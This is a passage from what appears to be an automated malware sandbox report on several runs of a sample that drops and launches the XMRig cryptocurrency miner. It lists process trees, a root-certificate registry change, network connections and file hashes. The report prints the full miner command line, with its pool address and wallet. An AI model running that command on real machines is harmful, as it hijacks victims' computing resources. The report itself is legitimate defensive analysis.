memory/2928-62-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-63-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-64-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-65-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-66-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-67-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-68-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-69-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-70-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-71-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-72-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-73-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-74-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-75-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-76-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-77-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-78-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-79-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-80-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-81-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-82-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-83-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

memory/2928-84-0x00007FF6F0E70000-0x00007FF6F1973000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:24

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1783s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 36.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 104.116.69.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2140-16-0x000002228D5B0000-0x000002228D5D0000-memory.dmp

memory/2140-17-0x000002228D600000-0x000002228D620000-memory.dmp

memory/2140-18-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-19-0x000002228D620000-0x000002228D640000-memory.dmp

memory/2140-20-0x000002228D640000-0x000002228D660000-memory.dmp

memory/2140-21-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-22-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-23-0x000002228D620000-0x000002228D640000-memory.dmp

memory/2140-25-0x000002228D640000-0x000002228D660000-memory.dmp

memory/2140-24-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-26-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-27-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-28-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-29-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-30-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-31-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-32-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-33-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-34-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-35-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-36-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-37-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-38-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-39-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-40-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-41-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-42-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-43-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-44-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-45-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-46-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-47-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-48-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-49-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-50-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-51-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-52-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-53-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-54-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-55-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-56-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-57-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-58-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-59-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-60-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-61-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-62-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-63-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-64-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-65-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-66-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-67-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-68-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-69-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-70-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-71-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-72-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-73-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-74-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-75-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-76-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-77-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-78-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-79-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-80-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-81-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-82-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-83-0x00007FF637D10000-0x00007FF638813000-memory.dmp

memory/2140-84-0x00007FF637D10000-0x00007FF638813000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:33

Platform

win10v2004-20240426-en

Max time kernel

1796s

Max time network

1798s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 964 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 964 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main.exe

"C:\Users\Admin\AppData\Local\Temp\main.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 52.111.229.48:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2484-16-0x0000022B56EA0000-0x0000022B56EC0000-memory.dmp

memory/2484-17-0x0000022B588B0000-0x0000022B588D0000-memory.dmp

memory/2484-18-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-19-0x0000022B588D0000-0x0000022B588F0000-memory.dmp

memory/2484-20-0x0000022B588F0000-0x0000022B58910000-memory.dmp

memory/2484-21-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-22-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-25-0x0000022B588F0000-0x0000022B58910000-memory.dmp

memory/2484-24-0x0000022B588D0000-0x0000022B588F0000-memory.dmp

memory/2484-23-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-26-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-27-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-28-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-29-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-30-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-31-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-32-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-33-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-34-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-35-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-36-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-37-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-38-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-39-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-40-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-41-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-42-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-43-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-44-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-45-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-46-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-47-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-48-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-49-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-50-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-51-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-52-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-53-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-54-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-55-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-56-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-57-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-58-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-59-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-60-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-61-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-62-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-63-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-64-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-65-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-66-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-67-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-68-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-69-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-70-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-71-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-72-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-73-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-74-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-75-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-76-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-77-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-78-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-79-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-80-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-81-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-82-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-83-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

memory/2484-84-0x00007FF714CE0000-0x00007FF7157E3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1797s

